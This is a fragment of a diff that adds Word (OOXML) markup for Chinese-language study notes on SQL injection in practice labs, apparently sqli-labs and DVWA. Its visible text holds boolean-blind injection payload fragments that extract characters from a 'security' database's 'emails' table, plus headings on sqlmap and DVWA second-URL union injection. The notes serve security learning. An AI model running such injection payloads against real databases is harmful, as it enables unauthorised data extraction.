+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>and table_schema='security' limit 0,1),1,1))=105</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>获取字段中的记录</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ascii(substr((select group_concat(id) from </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>emails),1,1))=49</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="44"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="44"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Sqlmap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5274310" cy="2816225"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="3175"/>
+            <wp:docPr id="1" name="图片 1" descr="ac400f3021c4b0a4a8e4a51ed907c424"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name="图片 1" descr="ac400f3021c4b0a4a8e4a51ed907c424"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2816225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>DVWA 高级：--second-url联合查询注入</w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
